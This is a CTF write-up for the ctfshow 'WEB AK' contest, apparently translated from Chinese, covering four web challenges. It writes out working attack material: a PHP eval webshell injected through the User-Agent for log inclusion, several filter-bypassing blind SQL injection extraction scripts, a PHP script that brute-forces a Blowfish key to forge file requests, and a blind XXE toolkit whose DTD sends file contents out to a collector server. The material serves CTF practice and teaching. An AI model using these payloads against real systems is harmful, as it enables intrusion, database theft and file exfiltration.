[Original] ctfshow: WEB AK Contest

Check-in: 观己

The string php is filtered, so the file inclusion can't be pointed at php:// wrappers; we need a file we can write to instead.

Read the log file /var/log/nginx/access.log

The User-Agent is written into the log, so a one-line webshell can be planted through it:

<?php @eval($_POST[shell]);?>

Connect with AntSword (蚁剑) and the flag is sitting in the root directory.

web1_观字

Just replace . with the full-width 。 and it goes through.

web2_观星

One look and it's clearly boolean-based blind injection.

Recall that web1-14 had similar challenges.

First check what's filtered.

Also a fuzz wordlist: https://github.com/fuzzdb-project/fuzzdb

Best to write your own script.

Borrowing 羽 master's (●’◡’●)

  • Comma filtered: use the substr((database())from({})for(1)) form
  • = and like filtered: use regexp or in instead
  • ascii replaced by ord
  • Single quotes bypassed with hex literals
  • Spaces filtered: parentheses take their place
#author  羽
import requests
url="http://733ff90c-f8ab-4a3b-af6e-3ebb2f4a7b12.chall.ctf.show/index.php?id=1^"
flag=""
for i in range(1,50):
    print("i="+str(i))
    for j in range(38,126):
        # XOR injection: a correct guess makes the CASE return 2 (1^2=3), a wrong one 3 (1^3=2),
        # so the "I asked nothing" text of the id=3 page means the guess was right
        #u="case(ord(substr(database()from({0})for(1))))when({1})then(2)else(3)end".format(i,j)  # database name: web1
        #u="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) # table names: flag, page, user
        #u="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) # column names: FLAG_COLUMN, flag
        u="case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) # flag column
        u=url+u
        r=requests.get(u)
        t=r.text
        if("I asked nothing" in t):
            flag+=chr(j)
            print(flag)
            break

I tweaked it slightly, haha

import requests
url="http://305d6aed-86db-41a3-b428-8831ce41b54b.chall.ctf.show/index.php?id=1^"
true = 'Languor was'   # text of the id=3 page, i.e. the page shown when the guess is right (1^2=3)
name = ''
for number1 in range(1,50):
    for number2 in range(38,126):
        # urls="case(ord(substr(database()from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2)  # database name: web1
        # urls = "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) # table names: flag, page, user
        # urls = "case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) # column names: FLAG_COLUMN, flag
        urls = "case(ord(substr((select(group_concat(flag))from(flag))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) # flag column
        urls = url + urls
        response = requests.get(urls)
        if true in response.text:
            name += chr(number2)
            print(name)
            break

Update, 2020.10.20, 11:42 A.M.

A different approach

I wrote another version with a different method, to broaden the way of thinking.

import requests
url="http://8f65f4ee-c785-40f6-bbad-c2c4890e4850.chall.ctf.show/index.php?id=1^"
true = "all about you"
name = ''
for number1 in range(1,50):
    for number2 in range(44,126):
        # Comparison instead of CASE: id=1^(ord(...)>N). A true comparison gives id=0, a false one id=1.
        # The loop stops at the first number2 for which the marker appears, so the marker must be
        # text of the page served when the comparison is FALSE (1^0=1); the first such number2 is
        # exactly ord(char). Spaces are replaced by /**/ here, and the outer parentheses stand in for the rest.
        #urls = "(ord(substr(database()/**/from/**/%d/**/for/**/1))>%d)" % (number1,number2)
        #urls = "(ord(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in(database()))/**/from/**/%d/**/for/**/1))>%d)^0" % (number1,number2)
        #urls = "(ord(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/in(0x666c6167))from/**/%d/**/for/**/1/**/))>%d)^0" % (number1,number2)
        urls = "(ord(substr((select(flag)from(flag))from/**/%d/**/for/**/1))>(%d))" % (number1,number2)
        urls = url + urls
        response = requests.get(urls)
        if true in response.text:
            name += chr(number2)
            print(name)
            break
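As an added example (not from the original post and not 羽's script), here is the same blind extraction written so that the payload builder refuses any token from the filter list above (space, comma, quotes, =, like, ascii) and each character is recovered by binary search on ord() instead of a linear scan of 38..126: about 7 requests per character instead of up to 88. The challenge host and the page marker are assumptions; the offline oracle evaluates the condition against a constructed secret so the script runs without the target.

```python
import re
from urllib.parse import quote
from urllib.request import urlopen

# Constructed secret for the offline oracle; not data from the challenge.
DEMO_SECRET = "ctfshow{demo_flag}"

# Tokens the write-up says the challenge filters. Bypasses used below:
# substr(x from N for 1) instead of substr(x,N,1), ord() instead of ascii(),
# parentheses instead of spaces, regexp/in instead of = and like, hex literals instead of quotes.
BANNED = re.compile(r"[ ,'\"=]|like|ascii", re.IGNORECASE)


def build_cond(subquery: str, pos: int, threshold: int) -> str:
    """Boolean condition for the XOR injection id=1^(<cond>).

    subquery is a bracketed, comma-free SELECT such as
    "(select(group_concat(flag))from(flag))". The condition tests
    ord(<pos>-th character) > threshold using only unfiltered tokens.
    """
    cond = f"(ord(substr({subquery}from({pos})for(1)))>({threshold}))"
    if BANNED.search(cond):
        raise ValueError("payload contains a filtered token: " + cond)
    return cond


def extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover a string character by character, binary-searching ord() per position.

    oracle(cond) must return True iff the SQL condition is true.
    MySQL returns '' for substr() past the end and ord('') = 0, which ends the loop.
    """
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = -1, 127            # invariant: lo < ord(ch) <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(build_cond(subquery, pos, mid)):
                lo = mid
            else:
                hi = mid
        if hi == 0:                 # past the end of the string
            break
        out.append(chr(hi))
    return "".join(out)


def make_fake_oracle(secret: str):
    """Offline stand-in for the database: evaluates the condition against `secret`."""
    tail = re.compile(r"from\((\d+)\)for\(1\)\)\)>\((\d+)\)\)$")

    def oracle(cond: str) -> bool:
        m = tail.search(cond)
        pos, threshold = int(m.group(1)), int(m.group(2))
        ch = secret[pos - 1:pos]    # '' past the end, like MySQL substr()
        return (ord(ch) if ch else 0) > threshold

    return oracle


def make_http_oracle(base_url: str, marker_when_true: str):
    """Live oracle for the challenge form: GET base_url + '1^' + cond.

    base_url is e.g. "http://<host>/index.php?id=" (hypothetical host).
    With XOR a true condition turns id=1 into id=0, so marker_when_true
    must be text that appears only on the page served for id=0.
    """
    def oracle(cond: str) -> bool:
        with urlopen(base_url + "1^" + quote(cond, safe="()>")) as r:
            return marker_when_true in r.read().decode(errors="replace")

    return oracle


if __name__ == "__main__":
    oracle = make_fake_oracle(DEMO_SECRET)
    print(extract(oracle, "(select(group_concat(flag))from(flag))"))
```

To run it against a target, swap make_fake_oracle for make_http_oracle(url, marker) and reuse the page's own subqueries for the database, table and column names (for example the regexp(0x666c6167) form for the column lookup); build_cond will raise if a subquery reintroduces a filtered token.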

web3_观图

This one is just wild.

The page hands out an address. It looks like base64 but isn't.

Visit showImage.php.

The source shows the encryption scheme it uses.

Other masters said it's DES.

But the OpenSSL name for DES would be des-ecb; bf-ecb is Blowfish (bf) in ECB mode.

I honestly couldn't find anything on this bf-ecb; masters, please leave a comment and explain.

Here openssl_decrypt() decrypts
and openssl_encrypt() encrypts.

The target is obvious by now.

The key is derived from a PHP rand() value. The write-up assumes it is at most 32767 (the classic 15-bit RAND_MAX; note that getrandmax() is 2147483647 on Linux, so this only works because the key space here really is that small), which leaves 32768 candidates to brute-force:

Then encrypt the filename you want and request it.

<?php
// Key = 8 chars of md5('ctfshow' . rand()) starting at offset 3, as in the challenge source.
// Cipher is Blowfish in ECB mode ('bf-ecb'); openssl_decrypt() takes base64 input by default.
$image = "Z6Ilu83MIDw=";   // the ciphertext the page hands out
$found = -1;
for ($i = 0; $i < 32768; $i++) {
    $key = substr(md5('ctfshow' . $i), 3, 8);
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    // openssl_decrypt() returns false on a padding error; compare with !== false so a
    // match at offset 0 (which strpos() reports as 0, i.e. falsy) is not missed.
    if ($str !== false && (strpos($str, "gif") !== false || strpos($str, "jpg") !== false || strpos($str, "png") !== false)) {
        $found = $i;
        print($i . " -> " . $str . "\n");
        break;
    }
}
if ($found < 0) {
    die("seed not found\n");
}
// Re-encrypt the file we actually want with the recovered key and URL-encode it for the query string.
$key = substr(md5('ctfshow' . $found), 3, 8);
$image = "config.php";
$str = openssl_encrypt($image, 'bf-ecb', $key);
echo urlencode($str);
?>

Save the response and view it.

web4_观心

Clicking "divination" (占卜) reveals an API.

Look closely and an xml file is plainly visible.

Barring surprises, it's an XXE vulnerability.

Since it's blind OOB XXE,

it's a bit hard, so I recommend these masters' articles:

https://www.freebuf.com/articles/web/177979.html

https://blog.csdn.net/miuzzx/article/details/107706685

https://www.cnblogs.com/anweilx/p/13417899.html#web4_%E8%A7%82%E5%BF%83

http://www.manongjc.com/detail/19-mqrlpvrfmyquahz.html

https://www.cnblogs.com/Cl0ud/p/13549041.html
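As an added example (not from this post or from the linked articles), here is the mechanism behind blind out-of-band XXE in code: the attacker-hosted DTD whose parameter entities read a file and smuggle it into a URL the victim's parser will fetch, the XML body that pulls that DTD in, and a small loopback collector that serves the DTD and decodes the callback. The API endpoint, element names, target file and collector address are all placeholders; nothing here is taken from the challenge.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import unquote, urlparse
from urllib.request import urlopen

# Hypothetical file to read on the victim; not from the challenge.
DEMO_TARGET = "/etc/hostname"


def external_dtd(collector_url: str, target: str) -> str:
    """DTD hosted on the attacker's server. Parameter entities do the work:
    %file reads the target through php://filter (base64 keeps newlines and
    binary bytes intact), %eval declares a second entity whose SYSTEM URL
    embeds that data, and expanding %exfil makes the victim's XML parser
    request collector_url/?d=<base64> with the file contents inside."""
    return (
        f'<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={target}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{collector_url}/?d=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def xml_payload(collector_url: str) -> str:
    """Body sent to the vulnerable XML API (root element is a placeholder):
    it only needs to pull in the external DTD, the parser does the rest."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [ <!ENTITY % dtd SYSTEM "{collector_url}/evil.dtd"> %dtd; ]>\n'
        "<r>1</r>\n"
    )


def decode_callback(query: str) -> str:
    """Turn the '?d=<base64>' query string of the callback back into text.
    Percent-decode only: '+' is part of base64 and must not become a space."""
    if not query.startswith("d="):
        raise ValueError("unexpected callback query: " + query)
    return base64.b64decode(unquote(query[2:])).decode(errors="replace")


class Collector(BaseHTTPRequestHandler):
    """Serves evil.dtd and records whatever the victim sends back."""

    def do_GET(self):
        u = urlparse(self.path)
        if u.path == "/evil.dtd":
            body, status = external_dtd(self.server.url, self.server.target).encode(), 200
        elif u.query.startswith("d="):
            self.server.received.append(decode_callback(u.query))
            body, status = b"", 200
        else:
            body, status = b"", 404
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo output quiet
        pass


def start_collector(target: str) -> ThreadingHTTPServer:
    """Start the collector on a free loopback port in a background thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), Collector)
    srv.url = f"http://127.0.0.1:{srv.server_port}"
    srv.target = target
    srv.received = []
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_collector(DEMO_TARGET)
    print(xml_payload(srv.url))                             # what you would POST to the API
    print(urlopen(srv.url + "/evil.dtd").read().decode())   # what the victim's parser fetches
    # Simulate the victim's callback with constructed content (no real victim involved).
    fake = base64.b64encode(b"demo-host\n").decode()
    urlopen(srv.url + "/?d=" + fake).read()
    print("exfiltrated:", srv.received)
    srv.shutdown()
```

The collector must be reachable from the target, so in practice it runs on a public host rather than loopback; the base64 wrapper matters because raw file contents with newlines or angle brackets would make the generated SYSTEM URL invalid and the callback would never fire.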


==> Please credit the source when reposting <==

Comments

  1. 华扬 (blog owner)
     11 months ago, 2021-3-03 9:57:03

     Take a look
